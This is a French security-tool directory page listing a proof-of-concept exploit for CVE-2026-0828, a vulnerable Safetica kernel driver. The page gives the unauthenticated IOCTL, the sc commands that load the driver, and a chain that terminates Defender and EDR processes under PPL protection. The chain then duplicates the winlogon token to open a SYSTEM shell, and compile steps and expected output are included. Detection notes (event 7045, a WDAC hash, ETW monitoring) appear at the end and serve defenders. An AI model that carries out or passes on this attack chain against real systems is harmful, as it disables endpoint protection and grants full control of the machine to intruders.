Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2026-0828 — Exploit de preuve de concept pour CVE-2026-0828, une vulnérabilité BYOVD dans Safetica ProcessMonitorDriver.sys permettant l'arrêt non privilégié de processus protégés par PPL et une élévation de privilèges locale vers SYSTEM via l'abus d'IOCTL et la duplication de jetons. | Kitploit
Outils/GitHubGitHub/mein-0/cve-2026-0828
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationÉvasion IDS/IPSMouvement LatéralPost-ExploitationRed TeamingDéveloppement de Charges UtilesExploitation de Binaires
GitHubmein-0/cve-2026-0828

cve-2026-0828

Exploit de preuve de concept pour CVE-2026-0828, une vulnérabilité BYOVD dans Safetica ProcessMonitorDriver.sys permettant l'arrêt non privilégié de processus protégés par PPL et une élévation de privilèges locale vers SYSTEM via l'abus d'IOCTL et la duplication de jetons.

13il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt

CVE-2026-0828 — PoC BYOVD pour Safetica ProcessMonitorDriver.sys

Le pilote noyau Safetica DLP (ProcessMonitorDriver.sys) expose un IOCTL non authentifié qui permet à tout appelant en mode utilisateur de terminer des processus arbitraires via ZwTerminateProcess en contexte noyau, contournant ainsi la protection PPL (Protected Process Light).

CVSS : 8.8 (Élevé) · Type : BYOVD, LPE · Plateforme : Windows x64


Vulnérabilité

Le gestionnaire IRP_MJ_DEVICE_CONTROL pour l’IOCTL 0xB822200C appelle ZwOpenProcess avec PROCESS_ALL_ACCESS (0x1FFFFF) puis ZwTerminateProcess en utilisant un PID fourni directement depuis le tampon d’entrée — sans aucune validation de privilège ou d’appelant.

root@kitploit:~
// Gestionnaire vulnérable (pseudocode IDA)
ClientId.UniqueProcess = **(HANDLE **)(irp->AssociatedIrp.SystemBuffer);

ZwOpenProcess(&ProcessHandle, 0x1FFFFFu, &ObjectAttributes, &ClientId);
ZwTerminateProcess(ProcessHandle, 0);  // pas de SeSinglePrivilegeCheck, pas de vérification ExGetPreviousMode

Comme l’appel provient du contexte noyau, les processus protégés par PPL (Windows Defender, agents EDR) peuvent être tués.

Versions concernées : Safetica < 11.26.19 / < 10.5.150
Corrigé dans : Safetica 11.26.19, 11.29.8, 10.5.150 — ajout d’une vérification de privilège dans le gestionnaire IOCTL
Références : Avis KOSEC · CERT VU#818729


Chaîne d’attaque

root@kitploit:~
Privilèges administrateur
    │
    ├─► Charger ProcessMonitorDriver.sys
    │       sc create STProcessMonitor type=kernel binPath=...
    │
    ├─► PHASE 1 : Tuer l’EDR via l’IOCTL 0xB822200C
    │       DeviceIoControl(\\.\STProcessMonitorDriver, 0xB822200C, &pid, 8, ...)
    │       → ZwTerminateProcess(Defender/EDR, 0)  [ctx noyau, PPL contourné]
    │
    └─► PHASE 2 : Duplication de jeton → shell SYSTEM
            AdjustTokenPrivileges(SeDebugPrivilege)
            OpenProcess(winlogon.exe)
            DuplicateTokenEx(TokenPrimary)
            CreateProcessWithTokenW(cmd.exe)
            → NT AUTHORITY\SYSTEM

Fichiers

FichierDescription
exploit.cPoC complet — tue l’EDR, lance cmd.exe sous NT AUTHORITY\SYSTEM

Compilation

Nécessite Visual Studio (Invite de commandes native x64) :

root@kitploit:~
cl.exe /W3 /O1 /nologo exploit.c /Fe:exploit.exe

Utilisation

Étape 1 — Charger le pilote (CMD administrateur) :

root@kitploit:~
sc create STProcessMonitor type= kernel binPath= "C:\chemin\vers\ProcessMonitorDriver.sys"
sc start STProcessMonitor

Étape 2 — Lancer le PoC :

root@kitploit:~
exploit.exe

Sortie attendue :

root@kitploit:~
[Phase 1] Killing EDR via CVE-2026-0828...
  MsMpEng.exe       PID 3412  -> KILLED
  NisSrv.exe        PID 4180  -> KILLED

SeDebugPrivilege enabled
winlogon.exe -> pid 560
[+] Got SYSTEM token handle.
[+] Token duplicated.
shell spawned

Une nouvelle fenêtre cmd.exe s’ouvre en tant que NT AUTHORITY\SYSTEM.


Détection

ID d’événement 7045 — installation d’un nouveau service noyau :

root@kitploit:~
Service Name:      STProcessMonitor
Service File Name: ...\ProcessMonitorDriver.sys
Service Type:      kernel mode driver

Liste de blocage WDAC (SHA256) :

root@kitploit:~
70bcec00c215fe52779700f74e9bd669ff836f594df92381cbfb7ee0568e7a8b

ETW : Surveiller les appels DeviceIoControl vers \\.\STProcessMonitorDriver.


Testé sur

  • Windows 10 22H2 x64

Réservé à la recherche en sécurité autorisée et à une utilisation en laboratoire uniquement. Ne pas utiliser contre des systèmes que vous ne possédez pas ou pour lesquels vous n’avez pas d’autorisation écrite de test.

Télécharger l’outil